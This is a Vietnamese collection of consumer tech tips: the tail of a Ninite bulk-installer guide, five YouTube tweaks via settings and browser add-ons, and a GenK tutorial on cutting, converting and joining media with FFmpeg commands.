Sau đó kích nút Get Installer, site sẽ gửi cho bạn một file thực thi, khi chạy file thực thi này, nó sẽ download tất cả các ứng dụng mà bạn đã chọn lúc trước và cài đặt chúng với các thiết lập mặc định, không cần sự can thiệp của bạn. Chương trình sẽ không cài đặt các thanh công cụ. Cần phải hết sức thận trọng trong việc chọn phiên bản, nếu hệ điều hành của bạn là 64-bit, hãy chọn các phiên bản ứng dụng 64-bit cho thích hợp. Sau khi cài đặt xong bạn có thể thực hiện một số điều chỉnh giá trị mặc định, tuy nhiên công việc này sẽ không ngốn quá nhiều thời gian.
Nếu muốn sử dụng các phần mềm khác không có sẵn trên website của Ninite, bạn cần phải cài chúng lúc này. Ví dụ như bạn cần phải cài đặt các phần mềm như Microsoft Office, Photoshop hay game,…

Chúc các bạn thành công !

5 tiện ích giúp tận dụng tối đa YouTube

1. Chặn các thông báo Annotation

Annotation là thông báo nhỏ nổi lên trên mỗi nội dung video của người dùng để hiển thị các liên kết đến video liên quan, nhằm thu hút sự quan tâm của người dùng dịch vụ chia sẻ video trực tuyến hàng đầu của Google.

Tuy nhiên, nếu cảm thấy bị làm phiền bởi các thông báo này, bạn có thể tắt chúng đi chỉ với vài thao tác đơn giản.

Tắt hiển thị các thông báo "nổi" trên nội dụng video bằng tùy chọn từ chính Youtube cung cấp.

Để thực hiện, bạn vào mục Youtube Settings (nằm ẩn trong biểu tượng người dùng ở góc phải giao diện), chọn liên kết Playback ở phần khung bên trái, sau đó, gỡ bỏ tùy chọn Annotations and Interactivity ở phần khung bên phải là xong.

2. Tắt tính năng AutoPlay

Với hầu hết các nội dung video được chọn, mặc định YouTube sẽ tự động phát (Autoplay) nhằm giảm bớt thao tác cho người dùng cuối. Song nếu không muốn sử dụng tính năng này nữa vì lý do nào đó, bạn có thể tắt đi nhờ một tiện ích bổ sung (add-on) cho trình duyệt của mình.

Với Chrome, bạn có thể tìm và tải về add-on mang tên StopAutoplay cho trình duyệt của mình, sau đó vào chrome://extensions/ để kích hoạt phần mở rộng này.

Bạn có thể khóa tính năng tự động phát video nhờ Add-on cài đặt thêm cho trình duyệt.

Riêng với Firefox, để có thể tắt tính năng Autoplay của YouTube, bạn sẽ phải cần đến sự trợ giúp của add-on có tên gọi YouTube Control Center. Sau khi thêm add-on này vào trình duyệt, bạn nhấn chuột vào biểu tượng của tiện ích này ở góc phải (gần biểu tượng Menu của Firefox), chọn tiếp biểu tượng hình bánh răng và đảm bảo rằng tùy chọn Autoplays video when the player loads đã được bỏ chọn là xong.

3. Xem video ở dạng Slow-motionYouTube mặc định cũng hỗ trợ trình chơi video HTML5 với tính năng chiếu chậm một đoạn video thông thường, song người dùng phải yêu cầu tính năng này bằng cách truy cập đường dẫn http://www.youtube.com/html5 thay vì sử dụng địa chỉ thông thường.

Bạn cũng có thể ép Youtube phát video ở tốc độ chậm hơn bình thường.

Một khi truy cập dịch vụ YouTube theo liên kết này, trong trình chơi video, người dùng sẽ có thêm tùy chọn chiếu chậm, rất thích hợp cho nhu cầu xem chi tiết các video chuyển động nhanh. Tuy nhiên, để có thể sử dụng tính năng này, trình duyệt của bạn đương nhiên phải hỗ trợ định dạng HTML5.

4. Tải phụ đề video

Trên YouTube, có rất nhiều các video được đăng tải và chia sẻ dưới những ngôn ngữ khác nhau. Dịch vụ chia sẻ video trực tuyến này mặc định cho phép tác giả tải kèm phụ đề cho mỗi video được tải lên. Tuy nhiên, mỗi khi những đoạn video này được người dùng tải xuống máy tính của mình, YouTube lại không hỗ trợ tải kèm phụ đề đi kèm.

Với KeepSub, việc tải phụ đề kèm theo video Youtube cũng thật đơn giản.

Tuy vậy, với dịch vụ tải phụ đề từ bên thứ 3 tên gọi KeepSub, bạn có thể dễ dàng tải phụ đề liên quan với nội dung video trên YouTube một cách dễ dàng.

Để thực hiện, người dùng trước hết chỉ cần mở Youtube, chọn đúng video cần tải phụ đề, sau đó chép (copy) địa chỉ URL của video này. Tiếp đến, bạn truy cập website http://keepsubs.com/ rồi dán liên kết vừa chép ở trên vào ô text box trong site này và nhấn nút Download.

Bên cạnh khả năng tải phụ đề, KeepSub cũng hỗ trợ tính năng phiên dịch phụ đề sử dụng công cụ Google Translate.

5. Ép YouTube tải trước toàn bộ video

Thông thường YouTube chỉ buffer (tải trước) nội dung video với thời lượng 30 giây trên tổng số thời lượng phát. Nếu đường truyền ổn định và có tốc độ nhanh, bạn có thể ép dịch vụ này tải về trước toàn bộ nội dung video nhờ tiện ích SmartVideo for YouTube cài đặt thêm.

Smart Buffer cho phép người dùng tùy chỉnh thời lượng video được tải trước.

Tiện ích SmartVideo for YouTube có thể tải về cả cho trình duyệt Chrome cũng như Firefox.

Một khi tải về tiện ích này, ngay dưới giao diện trình phát nội dung của YouTube, bạn sẽ thấy có thêm tùy chọn mở rộng. Lúc này bạn nhấn chuột vào mục Global Preferences sau đó chọn tiếp tùy chọn Smart Buffer như hình bên trên.

VnReview

Cắt ghép chỉnh sửa phim, nhạc theo phong cách... "lập trình viên"

Bỏ qua giao diện bóng bảy của các công cụ chuyển đổi định dạng media, hãy thử cảm giác làm việc với mã lệnh nhé.

Nếu nối về công cụ chuyển đổi định dạng video thì FFmpeg là lựa chọn tuyệt vời dành cho bạn. FFmpeg là một công cụ rất mạnh mẽ và tuyệt vời bằng dòng lệnh, với các tính năng chuyển đổi định dạng các tập tin âm thanh và video. Và càng tuyệt vời hơn khi FFmpeg được cung cấp hoàn toàn miễn phí cho Windows, Linux và Mac.

Nếu bạn quan tâm thì có thể tham khảo hướng dẫn làm việc với FFmpeg sau đây.
Chuẩn bị
Trước tiên, bạn cần tiến hành tải về FFmpeg phù hợp với hệ điều hành mình đang dùng tại đây.

Sau khi tải về gói tin nén của FFmpeg, bạn tiến hành xả nén chúng. Tiếp theo hãy tạo một thư mục tại phân vùng hệ thống (thường là ổ đĩa “C”) với tên gọi “FFmpegTool” và dán tất cả dữ liệu vừa xả nén được của FFmpeg vào.

Khi đã hoàn thành xong các bước chuẩn bị trên, ta tiến hành bắt đầu sử dụng FFmpeg bằng cách gọi hộp thoại Run lên, nhập lệnh “cmd” và nhấn ENTER để gọi cửa sổ Command Prompt lên.

Nhập vào lệnh “cd\” và nhấn ENTER

Tiếp tục nhập vào lệnh “cd FFmpegTool” để điều hướng đến thư mục FFmpegTool đã tạo trước đó.

Sau đó nhập tiếp vào lệnh “cd bin” và nhấn ENTER

Cuối cùng, bạn nhập vào lệnh “ffmpeg.exe” và nhấn ENTER. Khi đó FFmpeg sẽ tiến hành khởi chạy trong vòng 01 đến 02 giây như hình dưới.

Sử dụng

Để bắt đầu sử dụng, bạn tiến hành di chuyển tập tin media mình cần làm việc vào thư mục “bin” của FFmpegTool. Ở đây chúng ta sẽ sử dụng tập tin video có tên “samplevideo” để làm ví dụ.
Trích xuất audio từ video
Bạn tiến hành chuyển đổi bằng lệnh sau

ffmpeg -i yourvideoname.mp4 -vn -ab 128 outputaudio.mp3

Trong đó “128” là tiêu chuẩn audio 128Kbps, nếu bạn muốn tập tin audio theo chuẩn 250Kbps thì chỉ việc thay đổi giá trị “128” thành “256” là được.
Loại bỏ âm thanh trong tập tin video

ffmpeg -i yourvideoname.mp4 -an mutevideo.mp4

Thay đổi kích thước video

ffmpeg -i yourvideoname.mp4 -s 640x480 -c:a copy resizedvideo.mp4

Thêm ảnh nền vào tập tin audio

Bạn hãy di chuyển ảnh nền mà bạn muốn thêm vào tập tin audio vào cùng thư mục “bin” của FFmpegTool và sử dụng lệnh sau để gán vào.

ffmpeg -loop 1 -i inputimage.jpg -i inputaudio.mp3 -c:v libx264 -c:a –strict experimental -b:a 192k -shortest outputfile.mp4

Cắt đoạn trong video

Nếu bạn có một video có thời lượng 45 giây, nhưng bạn muốn rút ngắn nó xuống còn 40 giây thì bạn có thể sử dụng lệnh sau

ffmpeg -i yourvideoname.mp4 -ss 00:00:45 -codec copy -t 40 outputclip.mp4

Chia nhỏ video

Nếu bạn có một video có thời lượng khá dài như khoảng 2 phút, và bạn muốn cắt chúng ra làm 2 clip nhỏ với thời lượng mỗi clip là 59 giây thì bạn có thể sử dụng lệnh sau.

ffmpeg -i yourvideoname.mp4 -t 00:00:59 -c copy part1.mp4 -ss 00:00:59 -codec copy part2.mp4

Chuyển đổi định dạng video

Nếu bạn có một video đang ở định dạng MP4, và bạn muốn chuyển nó qua định dạng WMV thì bạn có thể sử dụng lệnh sau.

ffmpeg -i yourvideoname.mp4 -c:v libx264 outputfilename.wmv

Với định dạng khác thì bạn chỉ việc thay thế WMV thành định dạng mình muốn là được.

Nối video

Nếu bạn có những tập tin video theo từng phần và bạn muốn nối chung lại thành 1 tập tin video duy nhất, bạn có thể tiến hành như sau.
- Di chuyển các tập tin video cần nối vào thư mục “bin” của FFmpegTool
- Mở Notepad lên và nhập đường dẫn tập tin theo cú pháp như hình dưới

Khi nhập xong, hãy lưu lại thành tập tin TXT như “file-list.txt” chẳn hạn. Sau đó nhập vào lệnh sau

ffmpeg -f concat -i file-list.txt -c copy outputfile.mp4

Lưu ý: Bạn nên đổi tên tập tin theo như lệnh tương ứng để việc thực thi diễn ra dễ dàng hơn và cú pháp sẽ không bị sai.

Chúc Bạn Thành Công!!

GenK